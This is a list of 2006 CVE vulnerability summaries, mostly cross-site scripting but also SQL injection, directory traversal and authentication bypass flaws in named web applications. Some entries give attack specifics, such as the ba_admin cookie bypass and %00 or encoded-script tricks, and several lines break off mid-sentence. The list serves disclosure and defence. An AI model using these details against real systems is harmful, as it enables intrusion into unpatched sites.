[CVE-2006-1127] Cross-site scripting (XSS) vulnerability in Gallery 2 up to 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For (X_FORWARDED_FOR) HTTP header, which is not properly handled when adding a comment to an album.
[CVE-2006-1122] Cross-site scripting (XSS) vulnerability in Default.asp in D2KBlog 1.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-1121] Cross-site scripting (XSS) vulnerability in CuteNews 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the query string to index.php.
[CVE-2006-1120] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 6.1.1 and earlier, with register_globals enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) its_url parameter in the documents page and (2) url parameter in the send_write page of (a) index.php
[CVE-2006-1110] Cross-site scripting (XSS) vulnerability in Aztek Forum 4.0 allows remote attackers to inject arbitrary web script or HTML via the message body in a new message.
[CVE-2006-1107] Cross-site scripting (XSS) vulnerability in news.php in NMDeluxe before 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the nick parameter.
[CVE-2006-1106] Cross-site scripting (XSS) vulnerability in Pixelpost 1.5 beta 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) message, (2) name, (3) url, and (4) email parameters when commenting on a post. NOTE: the vendor has disputed some issues from the original disclosure, but due to the vagueness of the dispute, it is not clear whether the vendor is disputing this particular issue.
[CVE-2006-1097] Multiple cross-site scripting (XSS) vulnerabilities in Datenbank MOD 2.7 and earlier for Woltlab Burning Board allow remote attackers to inject arbitrary web script or HTML via the fileid parameter to (1) info_db.php or (2) database.php.
[CVE-2006-1096] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in index.php in NZ Ecommerce allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor has disputed this issue in a comment on the researcher's blog, but research by CVE suggests that this might be a legitimate problem.
[CVE-2006-1093] Unspecified vulnerability in IBM WebSphere 5.0.2.10 through 5.0.2.15 and 5.1.1.4 through 5.1.1.9 allows remote attackers to obtain sensitive information via unknown attack vectors, which causes JSP source code to be revealed.
[CVE-2006-1089] Cross-site scripting (XSS) vulnerability in header.php in PunBB 1.2.10 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly handled when the PHP_SELF variable is used to handle a pun_page tag.
[CVE-2006-1082] Multiple cross-site scripting (XSS) vulnerabilities in phpArcadeScript 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the gamename parameter in tellafriend.php, (2) the login_status parameter in loginbox.php, (3) the submissionstatus parameter in index.php, the (4) cell_title_background_color and (5) browse_cat_name parameters in browse.php, the (6) gamefile parameter in displaygame.php, and (7) possibly other parameters in unspecified PHP scripts.
[CVE-2006-1080] Cross-site scripting (XSS) vulnerability in login.php in Game-Panel 2.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter, possibly requiring a URL encoded value.
[CVE-2006-1077] Multiple cross-site scripting (XSS) vulnerabilities in the commentary in Evo-Dev evoBlog allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter and (2) other unspecified parameters.
[CVE-2006-1072] Cross-site scripting (XSS) vulnerability in Daverave Simplog 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a blog post.
[CVE-2006-1071] Cross-site scripting (XSS) vulnerability in index.php in DVguestbook 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1070] Cross-site scripting (XSS) vulnerability in dv_gbook.php in DVguestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2006-1064] Multiple cross-site scripting (XSS) vulnerabilities in Lurker 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1048] Joomla! 1.0.7 and earlier allows attackers to bypass intended access restrictions and gain certain privileges via certain attack vectors related to the (1) Weblink, (2) Polls, (3) Newsfeeds, (4) Weblinks, (5) Content, (6) Content Section, (7) Content Category, (8) Contact items, or (9) Contact Search, (10) Content Search, (11) Newsfeed Search, or (12) Weblink Search.
[CVE-2006-1041] Multiple cross-site scripting (XSS) vulnerabilities in Gregarius 0.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) rss_query parameter to search.php or (2) tag parameter to tags.php.
[CVE-2006-1040] Cross-site scripting (XSS) vulnerability in vBulletin 3.0.12 and 3.5.3 allows remote attackers to inject arbitrary web script or HTML via the email field, which is injected in profile.php but not sanitized in sendmsg.php.
[CVE-2006-1039] SAP Web Application Server (WebAS) Kernel before 7.0 allows remote attackers to inject arbitrary bytes into the HTTP response and obtain sensitive authentication information, or have other impacts, via a "
[CVE-2006-1034] Multiple cross-site scripting (XSS) vulnerabilities in Woltlab Burning Board (wBB) allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to galerie_index.php and possibly (2) galerie_onfly.php. NOTE: the provenance of this information is unknown
[CVE-2006-1033] Multiple cross-site scripting (XSS) vulnerabilities in Dragonfly CMS before 9.0.6.1 allow remote attackers to inject arbitrary web script or HTML via (1) uname, (2) error, (3) profile or (4) the username field parameter to the (a) Your_Account module, (5) catid, (6) sid, (7) Story Text or (8) Extended text text fields in the (b) News module, (9) month, (10) year or (11) sa parameter to the (c) Stories_Archive module, (12) show, (13) cid, (14) ratetype, or (15) orderby parameter to the (d) Web_Links module, (16) op, or (17) pollid parameter to the (e) Surveys module, (18) c parameter to the (f) Downloads module, (19) meta, or (20) album parameter to the (g) coppermine module, or the search box in the (21) Search, (22) Stories_Archive, (23) Downloads, and (24) Topics module.
[CVE-2006-1031] config/config_inc.php in iGENUS Webmail 2.02 and earlier allows remote attackers to include arbitrary local files via the SG_HOME parameter.
[CVE-2006-1025] Cross-site scripting (XSS) vulnerability in manage.asp in Addsoft StoreBot 2002 Standard allows remote attackers to inject arbitrary web script or HTML via the ShipMethod parameter. NOTE: the provenance of this information is unknown
[CVE-2006-1021] Cross-site scripting (XSS) vulnerability in sol_menu.php in PeHePe Uyelik Sistemi (aka PeHePe MemberShip Management System) 3 allows remote attackers to inject arbitrary web script or HTML via the kuladi parameter ($kul_adi variable).
[CVE-2006-1019] Cross-site scripting (XSS) vulnerability in fce.php in UKiBoard 3.0.1 allows remote attackers to inject arbitrary web script or HTML via a BBCode url tag when using the show_post function. NOTE: the provenance of this information is unknown
[CVE-2006-1008] Multiple cross-site scripting (XSS) vulnerabilities in N8cms 1.1 and 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) dir and (2) page_id parameter to (a) index.php and (3) userid parameter to (b) mailto.php. NOTE: it is possible that issues 1 and 2 are resultant from SQL injection.
[CVE-2006-1004] Cross-site scripting (XSS) vulnerability in agencyprofile.asp in Parodia 6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the AG_ID parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0996] Cross-site scripting (XSS) vulnerability in phpinfo (info.c) in PHP 5.1.2 and 4.4.2 allows remote attackers to inject arbitrary web script or HTML via long array variables, including (1) a large number of dimensions or (2) long values, which prevents HTML tags from being removed.
[CVE-2006-0985] Multiple cross-site scripting (XSS) vulnerabilities in the "post comment" functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters.
[CVE-2006-0984] Cross-site scripting (XSS) vulnerability in inc_header.php in EJ3 TOPo 2.2.178 allows remote attackers to inject arbitrary web script or HTML via the gTopNombre parameter.
[CVE-2006-0983] Cross-site scripting (XSS) vulnerability in index.php in QwikiWiki 1.4 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-0982] The on-access scanner for McAfee Virex 7.7 for Macintosh, in some circumstances, might not activate when malicious content is accessed from the web browser, and might not prevent the content from being saved, which allows remote attackers to bypass virus protection, as demonstrated using the EICAR test file.
[CVE-2006-0980] Multiple cross-site scripting (XSS) vulnerabilities in Jay Eckles CGI Calendar 2.7 allow remote attackers to inject arbitrary web script or HTML via the year parameter in (1) index.cgi and (2) viewday.cgi.
[CVE-2006-0979] Unspecified vulnerability in the local weblog publisher in Nidelven IT Issue Dealer before 0.9.96 has unknown impact and attack vectors.
[CVE-2006-0978] Multiple cross-site scripting (XSS) vulnerabilities in the View Headers (aka viewheaders) functionality in ArGoSoft Mail Server Pro 1.8.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the Subject header, (2) the From header, and (3) certain other unspecified headers.
[CVE-2006-0974] Cross-site scripting (XSS) vulnerability in failure.asp in Battleaxe bttlxeForum 2.0 allows remote attackers to inject arbitrary web script or HTML via the err_txt parameter.
[CVE-2006-0973] SQL injection vulnerability in topics.php in Appalachian State University phpWebSite 0.10.2 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter.
[CVE-2006-0958] Cross-site scripting (XSS) vulnerability in func.inc.php in ZoneO-Soft freeForum before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) subject parameters.
[CVE-2006-0947] Thomson SpeedTouch modem running firmware 5.3.2.6.0 allows remote attackers to create users that cannot be deleted via scripting code in the "31" parameter in a NewUser function, which is not filtered by the modem when creating the account, but cannot be deleted by the administrator, possibly due to cleansing that occurs in the administrator interface.
[CVE-2006-0946] Cross-site scripting (XSS) vulnerability in Thomson SpeedTouch modems running firmware 5.3.2.6.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter to the LocalNetwork page.
[CVE-2006-0945] PHP remote file include vulnerability in admin/index.php in Archangel Weblog 0.90.02 allows remote authenticated administrators to execute arbitrary PHP code via a URL ending in a NULL (%00) in the index parameter.
[CVE-2006-0944] Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1.
[CVE-2006-0941] Multiple cross-site scripting (XSS) vulnerabilities in post.php in ShoutLIVE 1.1.0 allow remote attackers to inject arbitrary web script or HTML via certain variables when posting new messages.
[CVE-2006-0938] Cross-site scripting (XSS) vulnerability in eZ publish 3.7.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the RefererURL parameter.
[CVE-2006-0936] Free Host Shop Website Generator 3.3 allows remote authenticated users with administrative privileges to upload and execute arbitrary files via a formname parameter with a filename containing a dangerous file extension and a trailing %00.
[CVE-2006-0934] Cross-site scripting (XSS) vulnerability in webinsta Limbo 1.0.4.2 allows remote attackers to inject arbitrary web script or HTML via the message field in the Contact Form.
[CVE-2006-0933] Cross-site scripting (XSS) vulnerability in PHPX 3.5.9 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in a url XCode tag in a posted message. NOTE: the provenance of this information is unknown
[CVE-2006-0930] Directory traversal vulnerability in Webmail in ArGoSoft Mail Server Pro 1.8 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the UIDL parameter.
[CVE-2006-0927] Multiple cross-site scripting (XSS) vulnerabilities in the JGS-XA JGS-Gallery Addon 4.0.0 and earlier for Woltlab Burning Board (wBB) 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) userid parameter in (a) jgs_galerie_slideshow.php and (b) jgs_galerie_scroll.php, and the (2) katid parameter in (c) jgs_galerie_slideshow.php.
[CVE-2006-0924] Cross-site scripting (XSS) vulnerability in Brown Bear iCal 3.10 allows remote attackers to inject arbitrary web script or HTML via the Calendar Text field when a new event is added. NOTE: the provenance of this information is unknown
[CVE-2006-0923] Multiple cross-site scripting (XSS) vulnerabilities in MyPHPNuke (MPN) 1.88 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the letter parameter in reviews.php and (2) the dcategory parameter in download.php.
[CVE-2006-0920] Oi! Email Marketing System 3.0 (aka Oi! 3) stores the server's FTP password in cleartext on a Configuration web page, which allows local users with superadministrator privileges, or attackers who have obtained access to the web page, to view the password.
[CVE-2006-0917] Melange Chat Server (aka M-Chat), when accessed via a web browser, automatically sends cookies and other sensitive information for a server to any port specified in the associated link, which allows local users on that server to read the cookies from HTTP headers and possibly gain sensitive information, such as credentials, by setting up a listening port and reading the credentials when the victim clicks on the link.
[CVE-2006-0896] Cross-site scripting (XSS) vulnerability in Sources/Register.php in Simple Machine Forum (SMF) 1.0.6 allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For HTTP header field.
[CVE-2006-0895] NOCC Webmail 1.0 allows remote attackers to obtain the installation path via a direct request to html/header.php.
[CVE-2006-0894] Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) html_no_mail parameter in no_mail.php, the (4) page_line, (5) prev, and (6) next parameters in html_bottom_table.php, and the (7) _SESSION['nocc_theme'] parameter in footer.php.
[CVE-2006-0893] NOCC Webmail 1.0 allows remote attackers to obtain sensitive information via a direct request to (1) the profiles directory, which leaks e-mail addresses contained in filenames of profiles, and (2) the tmp directory, which lists names of uploaded attachments.
[CVE-2006-0892] NOCC Webmail 1.0 stores e-mail attachments in temporary files with predictable filenames, which makes it easier for remote attackers to execute arbitrary code by accessing the e-mail attachment via directory traversal vulnerabilities.
[CVE-2006-0891] Multiple directory traversal vulnerabilities in NOCC Webmail 1.0 allow remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing NULL (%00) byte in (1) the _SESSION['nocc_theme'] parameter in (a) html/footer.php
[CVE-2006-0889] Cross-site scripting (XSS) vulnerability in Calcium 3.10.1 allows remote attackers to inject arbitrary web script or HTML via the EventText parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0886] Cross-site scripting (XSS) vulnerability in register.php in DEV web management system 1.5 allows remote attackers to inject arbitrary web script or HTML via the "City/Region" field (mesto variable). NOTE: the provenance of this information is unknown
[CVE-2006-0885] Cross-site scripting (XSS) vulnerability in show_news.php in CuteNews 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the show parameter.
[CVE-2006-0880] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Noah's Classifieds 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) inf parameter
[CVE-2006-0877] Cross-site scripting vulnerability in Easy Forum 2.5 allows remote attackers to inject arbitrary web script or HTML via the image variable.
[CVE-2006-0875] Cross-site scripting vulnerability in ratefile.php in RunCMS 1.3a5 allows remote attackers to inject arbitrary web script or HTML via the lid parameter.
[CVE-2006-0867] Buffer overflow in certain versions of South River (aka SRT) WebDrive, possibly version 6.08 build 1131 and version 8, allows remote attackers to cause a denial of service (application crash and persistent erratic behavior) via a long string in the name entry field.
[CVE-2006-0860] Multiple cross-site scripting (XSS) vulnerabilities in Michael Salzer Guestbox 0.6, and other versions before 0.8, allow remote attackers to inject arbitrary web script or HTML via (1) HTML tags that follow a "http://" string, which bypasses a regular expression check, and (2) other unspecified attack vectors.
[CVE-2006-0857] Cross-site scripting (XSS) vulnerability in Chatbox Plugin 1.0 in e107 0.7.2 allows remote attackers to inject arbitrary HTML or web script via a Chatbox, as demonstrated using a SCRIPT element.
[CVE-2006-0846] Multiple cross-site scripting (XSS) vulnerabilities in Leif M. Wright's Blog 3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Referer and (2) User-Agent HTTP headers, which are stored in a log file and not sanitized when the administrator views the "Log" page, possibly using the ViewCommentsLog function.
[CVE-2006-0843] Leif M. Wright's Blog 3.5 stores the config file and other txt files under the web root with insufficient access control, which allows remote attackers to read the administrator's password.
[CVE-2006-0842] Cross-site scripting (XSS) vulnerability in Calacode @Mail 4.3 allows remote attackers to inject arbitrary web script or HTML via a modified javascript: string in the SRC attribute of an IMG element in an e-mail message, as demonstrated by "java	
[CVE-2006-0841] Multiple cross-site scripting (XSS) vulnerabilities in Mantis 1.00rc4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) hide_status, (2) handler_id, (3) user_monitor, (4) reporter_id, (5) view_type, (6) show_severity, (7) show_category, (8) show_status, (9) show_resolution, (10) show_build, (11) show_profile, (12) show_priority, (13) highlight_changed, (14) relationship_type, and (15) relationship_bug parameters in (a) view_all_set.php
[CVE-2006-0840] manage_user_page.php in Mantis 1.00rc4 and earlier does not properly handle a sort parameter containing a ' (quote) character, which allows remote attackers to trigger a SQL error that may be repeatedly reported to a user who makes subsequent web accesses with the MANTIS_MANAGE_COOKIE cookie. NOTE: this issue might be the same as vector 2 in CVE-2005-4519.
[CVE-2006-0835] SQL injection vulnerability in dropbase.php in MitriDAT Web Calendar Pro allows remote attackers to modify internal SQL queries and cause a denial of service (inaccessible database) via the tabls parameter.
[CVE-2006-0834] Uniden UIP1868P VoIP Telephone and Router has a default password of admin for the web-based configuration utility, which allows remote attackers to obtain sensitive information on the device such as telephone numbers called, and possibly connect to other hosts. NOTE: it is possible that this password was configured by a reseller, not the original vendor
[CVE-2006-0833] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Directory 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to the (1) Add URL and (2) Suggest Category module. NOTE: the provenance of this information is unknown
[CVE-2006-0830] The scripting engine in Internet Explorer allows remote attackers to cause a denial of service (resource consumption) and possibly execute arbitrary code via a web page that contains a recurrent call to an infinite loop in Javascript or VBscript, which consumes the stack, as demonstrated by resetting the "location" variable within the loop.
[CVE-2006-0829] Cross-site scripting vulnerability in E-Blah Platinum 9.7 allows remote attackers to inject arbitrary web script or HTML via the referer (HTTP_REFERER), which is not sanitized when the log file is viewed by the administrator using "Click Log".
[CVE-2006-0828] Unspecified vulnerability in ESS/Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to "reduce effectiveness of security features" via unknown attack vectors.
[CVE-2006-0827] Cross-site scripting vulnerability in ESS/Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-0826] Unspecified vulnerability in ESS/Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to cause a denial of service via a crafted Postscript request.
[CVE-2006-0825] Multiple unspecified vulnerabilities in ESS/Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allow remote attackers to bypass authentication or gain "unauthorized network access" via unknown attack vectors.
[CVE-2006-0820] Cross-site scripting (XSS) vulnerability in Dwarf HTTP Server 1.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified error messages.
[CVE-2006-0818] Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with IceWarp Web Mail before 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558.
[CVE-2006-0817] Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with IceWarp Web Mail before 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556.
[CVE-2006-0815] NetworkActiv Web Server 3.5.15 allows remote attackers to read script source code via a crafted URL with a "/" (forward slash) after the file extension.
[CVE-2006-0811] Cross-site scripting (XSS) vulnerability in reguser.php in Skate Board 0.9 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters involved with the registration form.
[CVE-2006-0808] MUTE 0.4 allows remote attackers to cause a denial of service (messages not forwarded) and obtain sensitive information about a target by filling a client's mWebCache cache with malicious "zombie" nodes.
[CVE-2006-0806] Multiple cross-site scripting (XSS) vulnerabilities in ADOdb 4.71, as used in multiple packages such as phpESP, allow remote attackers to inject arbitrary web script or HTML via (1) the next_page parameter in adodb-pager.inc.php and (2) other unspecified vectors related to PHP_SELF.
[CVE-2006-0802] Cross-site scripting (XSS) vulnerability in the NS-Languages module for PostNuke 0.761 and earlier, when magic_quotes_gpc is enabled, allows remote attackers to inject arbitrary web script or HTML via the language parameter in a missing or translation operation.
[CVE-2006-0800] Interpretation conflict in PostNuke 0.761 and earlier allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML tags with a trailing "<" character, which is interpreted as a ">" character by some web browsers but bypasses the blacklist protection in (1) the pnVarCleanFromInput function in pnAPI.php, (2) the pnSecureInput function in pnAntiCracker.php, and (3) the htmltext parameter in an edituser operation to user.php.
[CVE-2006-0799] Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate "href" attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different.
[CVE-2006-0796] Cross-site scripting (XSS) vulnerability in default.php in Clever Copy 3.0 allows remote attackers to inject arbitrary web script or HTML via the Subject field when sending private messages (privatemessages.php). NOTE: the provenance of this information is unknown
[CVE-2006-0794] help.php in V-webmail 1.6.2 allows remote attackers to obtain the installation path via unspecified invalid parameters. NOTE: the provenance of this information is unknown
[CVE-2006-0793] frameset.php in V-webmail 1.6.2 allows remote attackers to conduct phishing attacks by referencing arbitrary websites in the rframe parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0792] Cross-site scripting (XSS) vulnerability in preferences.personal.php in V-webmail 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the newid parameter. NOTE: the provenance of this information is unknown
[CVE-2006-0783] Cross-site scripting (XSS) vulnerability in page.php in Siteframe Beaumont, possibly 5.0.2 or 5.0.1a, allows remote attackers to inject arbitrary web script or HTML via the comment_text parameter to the user comment page (/edit/Comment).
[CVE-2006-0782] Unspecified vulnerability in weblog.pl in PerlBlog 1.09b and earlier allows remote attackers to create arbitrary files and possibly execute arbitrary code via unspecified attack vectors related to improper handling of (1) the reply parameter, possibly involving injection of (2) the name parameter and (3) the body parameter.
[CVE-2006-0781] Directory traversal vulnerability in weblog.pl in PerlBlog 1.09b and earlier allows remote attackers to read certain files via the month parameter.
[CVE-2006-0780] Multiple cross-site scripting (XSS) vulnerabilities in weblog.pl in PerlBlog 1.09b and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) email parameters.
[CVE-2006-0779] Cross-site scripting (XSS) vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag.
[CVE-2006-0776] Cross-site scripting (XSS) vulnerability in guestex.pl in Teca Scripts Guestex 1.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2006-0773] Cross-site scripting (XSS) vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the extended receiving box function.
[CVE-2006-0770] Cross-site scripting (XSS) vulnerability in calendar.php in MyBulletinBoard (MyBB) 1.0.4 allows remote attackers to inject arbitrary web script or HTML via a URL that is not sanitized before being returned as a link in "advanced details". NOTE: the provenance of this information is unknown
[CVE-2006-0763] Cross-site scripting (XSS) vulnerability in dowebmailforward.cgi in cPanel allows remote attackers to inject arbitrary web script or HTML via a URL encoded value in the fwd parameter.
[CVE-2006-0760] LightTPD 1.4.8 and earlier, when the web root is on a case-insensitive filesystem, allows remote attackers to bypass URL checks and obtain sensitive information via file extensions with unexpected capitalization, as demonstrated by a request for index.PHP when the configuration invokes the PHP interpreter only for ".php" names.
[CVE-2006-0758] Multiple cross-site scripting (XSS) vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via a URL encoded expression in the query string in (1) index.php and (2) possibly certain other scripts, which is not properly cleansed when accessed from the $_SERVER['PHP_SELF'] variable.
[CVE-2006-0733] ** DISPUTED ** Cross-site scripting (XSS) vulnerability in WordPress 2.0.0 allows remote attackers to inject arbitrary web script or HTML via scriptable attributes such as (1) onfocus and (2) onblur in the "author's website" field. NOTE: followup comments to the researcher's web log suggest that this issue is only exploitable by the same user who injects the XSS, so this might not be a vulnerability.
[CVE-2006-0732] Directory traversal vulnerability in SAP Business Connector (BC) 4.6 and 4.7 allows remote attackers to read or delete arbitrary files via the fullName parameter to (1) sapbc/SAP/chopSAPLog.dsp or (2) invoke/sap.monitor.rfcTrace/deleteSingle. Details will be updated after the grace period has ended. NOTE: SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port
[CVE-2006-0728] SQL injection vulnerability in search.php in webSPELL 4.01.00 and earlier allows remote attackers to inject arbitrary SQL commands via the title_op parameter.
[CVE-2006-0726] Cross-site scripting (XSS) vulnerability in linking.php in CPG-Nuke Dragonfly CMS 9.0.6.1 allows remote attackers to inject arbitrary web script or HTML via a URI that is generated when creating a list of online users.
[CVE-2006-0715] Cross-site scripting (XSS) vulnerability in sNews 1.3 allows remote attackers to inject arbitrary web script or HTML via the comment field.
[CVE-2006-0707] PyBlosxom before 1.3.2, when running on certain webservers, allows remote attackers to read arbitrary files via an HTTP request with multiple leading / (slash) characters, which is accessed using the PATH_INFO variable.
[CVE-2006-0706] Cross-site scripting vulnerability in eintrag.php in Gästebuch (Gastebuch) before 1.3.3 allows remote attackers to inject arbitrary web script or HTML via the URL, which is used in the homepage parameter.
[CVE-2006-0704] iE Integrator 4.4.220114, when configured without a "bespoke error page" in acm.ini, allows remote attackers to obtain sensitive information via a URL that calls a non-existent .aspx script in the integrator/apps directory, which results in an error message that displays the installation path, web server name, IP, and port, session cookie information, and the IIS system username.
[CVE-2006-0699] Cross-site scripting (XSS) vulnerability in search.php in QWikiWiki 1.5, and possibly 1.5.1 and other versions, allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2006-0694] Unspecified vulnerability in the loaders (load_*.php) in Ansilove before 1.03 allows remote attackers to read arbitrary files via unspecified vectors involving "converting files accessible by the webserver".
[CVE-2006-0689] Cross-site scripting (XSS) vulnerability in the Registration Form in TTS Time Tracking Software 3.0 allows remote attackers to inject arbitrary web script or HTML via the UserName parameter.
[CVE-2006-0683] Cross-site scripting (XSS) vulnerability in Virtual Hosting Control System (VHCS) 2.4.7.1 with v.1 patch and earlier allows remote attackers to inject arbitrary web script or HTML via the username, which is recorded in a log file but not properly handled when the administrator uses the admin log utility to read the log file.
[CVE-2006-0682] Multiple cross-site scripting (XSS) vulnerabilities in bbcodes system in e107 before 0.7.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-0680] Unspecified vulnerability in WebGUI before 6.8.6-gamma allows remote attackers to create an account, when anonymous registration is disabled, via a certain URL.
[CVE-2006-0676] Cross-site scripting (XSS) vulnerability in header.php in PHP-Nuke 6.0 to 7.8 allows remote attackers to inject arbitrary web script or HTML via the pagetitle parameter.
[CVE-2006-0675] Cross-site scripting (XSS) vulnerability in search.php in Siteframe 5.0.1 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-0664] Cross-site scripting (XSS) vulnerability in config_defaults_inc.php in Mantis before 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: the provenance of this information is unknown
[CVE-2006-0663] Multiple cross-site scripting (XSS) vulnerabilities in Lotus Domino iNotes Client 6.5.4 and 7.0 allow remote attackers to inject arbitrary web script or HTML via (1) an email subject
[CVE-2006-0662] Cross-site scripting (XSS) vulnerability in Lotus Domino iNotes Client 6.5.4 allows remote attackers to inject arbitrary web script or HTML via email with attached html files, which are directly rendered in the browser.
[CVE-2006-0661] Cross-site scripting (XSS) vulnerability in Scriptme SmE GB Host 1.21 and SmE Blog Host allows remote attackers to inject arbitrary web script or HTML via the BBcode url tag.
[CVE-2006-0657] Cross-site scripting (XSS) vulnerability in Softcomplex PHP Event Calendar 1.5 allows remote authenticated users to inject arbitrary web script or HTML, and corrupt data, via the (1) username and (2) password parameters, which are not sanitized before being written to users.php. NOTE: while this issue was originally reported as XSS, the primary issue might be direct static code injection with resultant XSS.
[CVE-2006-0655] Multiple cross-site scripting (XSS) vulnerabilities in (1) link_edited.php and (2) link_added.php in Hinton Design phpht Topsites 1.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-0650] Cross-site scripting (XSS) vulnerability in cpaint2.inc.php in the CPAINT library before 2.0.3, as used in multiple scripts, allows remote attackers to inject arbitrary web script or HTML via the cpaint_response_type parameter, which is displayed in a resulting error message, as demonstrated using a hex-encoded IFRAME tag.
[CVE-2006-0649] Cross-site scripting (XSS) vulnerability in DataparkSearch before 4.37 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-0643] Cross-site scripting (XSS) vulnerability in WiredRed e/pop Web Conferencing 4.1.0.755 allows remote authenticated users to inject arbitrary web script or HTML via the topic name of a conference.
[CVE-2006-0642] Trend Micro ServerProtect 5.58, and possibly InterScan Messaging Security Suite and InterScan Web Security Suite, have a default configuration setting of "Do not scan compressed files when Extracted file count exceeds 500 files," which may be too low in certain circumstances, which allows remote attackers to bypass anti-virus checks by sending compressed archives containing many small files. NOTE: since this is related to a configuration setting that has an operational impact that might vary depending on the environment, and the product is claimed to report a message when the compressed file exceeds specified limits, perhaps this should not be included in CVE.
[CVE-2006-0641] Orbicule Undercover uses a third-party web server to determine the IP address through which the computer is accessing the Internet, but does not document this third-party disclosure, which leads to a potential privacy leak that might allow transmission of sensitive information to an unintended remote destination.
[CVE-2006-0639] Cross-site scripting (XSS) vulnerability in search.php in MyBB (aka MyBulletinBoard) 1.0.2 allows remote attackers with knowledge of the table prefix to inject arbitrary web script or HTML via a URL encoded value of the keywords parameter, as demonstrated by %3Cscript%3E.
